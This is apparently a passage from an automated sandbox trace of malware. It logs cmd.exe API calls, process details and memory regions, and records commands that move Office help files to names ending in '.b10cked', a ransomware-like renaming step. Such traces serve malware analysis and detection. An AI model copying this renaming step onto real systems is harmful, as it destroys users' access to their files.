cchData=128 | out: lpLCData="0") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf680, cchData=128 | out: lpLCData="1") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.430] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.431] GetConsoleTitleW (in: lpConsoleTitle=0x4808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.431] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.432] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.432] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.432] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.432] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.432] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.432] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.432] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.434] GetConsoleTitleW (in: lpConsoleTitle=0x2cf378, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.435] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.435] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.435] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.435] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.435] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.435] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.435] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.435] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.435] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.435] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.435] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.435] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.435] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.435] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.435] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.436] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.436] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.436] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.436] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.436] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.437] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.437] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.437] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf134, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf12c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf12c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.437] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.438] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.438] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2=".") returned 63 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2="..") returned 63 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsou~1.hxn")) returned 0x2022 [0204.439] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x491e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.439] SetErrorMode (uMode=0x0) returned 0x0 [0204.439] SetErrorMode (uMode=0x1) returned 0x0 [0204.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", nBufferLength=0x104, lpBuffer=0x2ceabc, lpFilePart=0x2ceaa4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", lpFilePart=0x2ceaa4*="MSMSOU~1.HXN") returned 0x27 [0204.439] SetErrorMode (uMode=0x0) returned 0x1 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2=".") returned 63 [0204.439] _wcsicmp (_String1="MSMSOU~1.HXN", _String2="..") returned 63 [0204.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsou~1.hxn")) returned 0x2022 [0204.439] SetErrorMode (uMode=0x0) returned 0x0 [0204.439] SetErrorMode (uMode=0x1) returned 0x0 [0204.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", nBufferLength=0x104, lpBuffer=0x2cef38, lpFilePart=0x2cecd0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", lpFilePart=0x2cecd0*="MSMSOU~1.HXN") returned 0x27 [0204.440] SetErrorMode (uMode=0x0) returned 0x1 [0204.440] SetErrorMode (uMode=0x0) returned 0x0 [0204.440] SetErrorMode (uMode=0x1) returned 0x0 [0204.440] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2cf140, lpFilePart=0x2cecd0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked", lpFilePart=0x2cecd0*="MS.MSOUC.14.1033.hxn.b10cked") returned 0x37 [0204.440] SetErrorMode (uMode=0x0) returned 0x1 [0204.440] SetLastError (dwErrCode=0x0) [0204.440] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msouc.14.1033.hxn.b10cked")) returned 0xffffffff [0204.440] GetLastError () returned 0x2 [0204.440] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2ce64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce64c) returned 0x480e68 [0204.440] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x2ce64c | out: lpFindFileData=0x2ce64c) returned 0 [0204.441] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.441] GetLastError () returned 0x12 [0204.441] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2ce64c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce64c) returned 0x480e68 [0204.441] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x2ce64c | out: lpFindFileData=0x2ce64c) returned 0 [0204.441] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.441] GetLastError () returned 0x12 [0204.442] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x491bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491bd8) returned 0x480e68 [0204.442] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x491bd8 | out: lpFindFileData=0x491bd8) returned 0 [0204.442] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.442] GetLastError () returned 0x12 [0204.442] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x491bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491bd8) returned 0x480e68 [0204.442] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x491bd8 | out: lpFindFileData=0x491bd8) returned 0 [0204.442] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.442] GetLastError () returned 0x12 [0204.443] _get_osfhandle (_FileHandle=2) returned 0xb [0204.443] GetFileType (hFile=0xb) returned 0x2 [0205.024] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0205.024] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ce81c | out: lpMode=0x2ce81c) returned 1 [0205.024] _get_osfhandle (_FileHandle=2) returned 0xb [0205.024] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ce850 | out: lpConsoleScreenBufferInfo=0x2ce850) returned 1 [0205.025] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.026] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce890 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.026] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2ce874, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce874*=0x2c) returned 1 [0205.027] longjmp () [0205.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.027] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.027] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.027] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.027] SetConsoleInputExeNameW () returned 0x1 [0205.027] GetConsoleOutputCP () returned 0x1b5 [0205.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.027] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.028] exit (_Code=1) Process: id = "467" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29256 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29257 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29258 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29259 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 29260 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29261 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29262 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29263 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29264 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29265 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29511 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29512 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29513 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29514 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 29515 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 29516 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29517 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29518 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29519 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29520 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29521 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29522 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29523 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29524 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29525 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29526 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29527 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29528 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29529 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29530 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 29531 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29532 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 29533 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 29534 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 29535 start_va = 0x12b0000 end_va = 0x136ffff entry_point = 0x12b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 663 os_tid = 0xd24 [0201.433] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afc2c | out: lpSystemTimeAsFileTime=0x2afc2c*(dwLowDateTime=0xacdefaa0, dwHighDateTime=0x1d440a9)) [0201.433] GetCurrentProcessId () returned 0xcc8 [0201.433] GetCurrentThreadId () returned 0xd24 [0201.433] GetTickCount () returned 0x38e2b [0201.433] QueryPerformanceCounter (in: lpPerformanceCount=0x2afc24 | out: lpPerformanceCount=0x2afc24*=25822205069) returned 1 [0201.433] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.433] __set_app_type (_Type=0x1) [0201.433] __p__fmode () returned 0x76b331f4 [0201.434] __p__commode () returned 0x76b331fc [0201.434] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.434] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.434] GetCurrentThreadId () returned 0xd24 [0201.434] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd24) returned 0x38 [0201.434] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.434] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.434] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.434] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.434] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afbbc | out: phkResult=0x2afbbc*=0x0) returned 0x2 [0201.434] VirtualQuery (in: lpAddress=0x2afbf3, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] GetConsoleOutputCP () returned 0x1b5 [0201.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.435] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.435] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.435] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.436] GetEnvironmentStringsW () returned 0x330180* [0201.436] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0201.436] GetEnvironmentStringsW () returned 0x330180* [0201.436] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0201.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb2c | out: phkResult=0x2aeb2c*=0x40) returned 0x0 [0201.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0xa8, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 